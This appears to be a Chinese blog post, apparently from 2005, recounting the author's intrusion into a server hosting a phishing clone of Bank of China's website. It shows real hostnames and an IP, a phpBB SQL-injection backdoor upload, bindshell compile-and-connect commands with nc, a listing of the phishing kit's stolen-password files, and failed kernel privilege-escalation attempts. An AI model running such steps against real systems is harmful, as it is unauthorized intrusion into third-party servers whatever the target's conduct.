27日晚看到天天网的一片报道:中国银行网站再次遭遇克隆;假网站远在北美
本来要整理规划的,既然出了这个事情,好歹看看吧 。废话不说,开始!
1、收集信息
服务器信息:;
Apache/1.3.33;;;
PHP/4.3.9;
网站主文件:;
http://www.banochi.net/english/index.shtml;
查看虚假网站,基本没发现什么可用的东西,估计只有记录密码和ip的cgi程序 。除了服务器入侵,还可以考虑旁注 。
检索其他站点,分析了几个php站点的注入,没太多利用的地方 。想起phpbb的洞洞,写段代码检索一下viewtopic.php文件,找到一个phpbb2.0.10入侵点
http://www.bits-clsu.org/forum/viewtopic.php?t=1;
事后才想起可以用旁注工具直接来检索,反正都一样 。
2、上传木马
利用phpbb的洞,漏洞介绍“phpBB远程任意SQL注入漏洞”,“phpbb〈2.0.11程序的sql注入漏洞分析”上传php后门 。
3、生成bindshell
我还在看文件的时候,Edward就已经做了个bindshell出来,呵呵!基本方法:
上传bindshell.c
gcc;-o;/tmp/bind;bindshell.c;
/tmp/bind;
nc上去看看,还是在shell下比较方便 。
nc;-vv;216.22.48.72;7758;
4、采集系统信息
拿到webshell后就可以获得一些基本的信息包括passwd、httpd.conf等等,检索到虚假网站的绝对路径;/home/banochin/public_html/,在webshell中查看文件创建的时期是服务器时间2004-12-15,在其cgi-;bin目录下有如下文件
文件;;;;;创建日期;最后修改;大小;;;;;属性;
[member];;;2005-02-21;21:39:03;2005-02-21;21:39:03;0700;
errlog.dat;2005-02-28;00:32:22;2005-02-28;00:32:22;140.186;KB;0600;
id.dat;;;2005-02-24;10:48:35;2005-02-24;10:48:35;1.727;KB;0600;
index.htm;2004-12-15;03:19:51;2004-12-15;03:19:51;0.697;KB;0644;
pwd.dat;;;2005-02-25;00:36:15;2005-02-25;00:36:15;0.170;KB;0600;
pwdbak.dat;2004-12-15;03:24:17;2004-12-15;03:19:55;0.516;KB;0600;
security.cgi;2004-12-15;03:24:03;2004-12-15;03:20:00;44.363;KB;0700;
visemailer.cgi;2004-12-15;03:24:04;2004-12-15;03:20:02;3.554;KB;0700;
可以看到最后记录的密码日期是2月25日,而浏览目录后发现还包括了很多其他语言的中国银行网站内容,但基本都是html文件,想必是从中国银行直接webdump下来的 。
内核信息,因为我们对其目录没有写权限,接着要做的就是提权了 。前后大概用了1小时左右,而剩下的提权工作却花了我1天多的时间,结果还是没搞定,郁闷!
uname;-r;
2.4.20-021stab022.11.777-enterprise;
5、本地提升权限测试
增加环境变量
export;PATH=/usr/bin:$PATH
否则会出现collect2:;cannot;find;`ld’错误!
(1)Linux;Kernel;moxa串行驱动BSS溢出漏洞
grsecurity;2.1.0;release;/;5;Linux;kernel;advisories
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7446&keyword=
http://lists.netsys.com/pipermail/full-disclosure/2005-January/030660.html
文件:
http://grsecurity.net/~spender/exploits_and_patches.tgz
测试:
wget;http://grsecurity.net/~spender/exploits_and_patches.tgz;
tar;-zxvf;exploits_and_patches.tgz;
cd;exploits_and_patches;
make;alloc=0x100000;
nasm;-f;elf;-DALLOCATE=32482374;mlock-dos.S;
make:;nasm:;Command;not;found;
make:;***;[;all;];Error;127;
结论:
缺少nasm,即使上传rpm也不能够执行安装!
(2)Linux;Kernel;uselib()特权提升漏洞
Linux;kernel;sys_uselib;local;root;vulnerability
URL:
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=7326&keyword=
http://marc.theaimsgroup.com/?l=bugtraq&m=110513415105841&q=raw
http://marc.theaimsgroup.com/?l=bugtraq&m=110512575901427&w=2
推荐阅读
- 中国银行手机银行怎么查卡号
- 中国银行手机银行怎么转账
- 中国银行手机银行怎么查开户行
- 关于V188虚假信号,打不出接不到的问题
- 一条虚假的静态默认路由
- 路由表问题引起故障 虚假的静态默认路由
- 执行中发现虚假诉讼怎么办
- 什么是虚假同感偏差?
- 中国银行中午休息吗
- 虚假合同是无效合同吗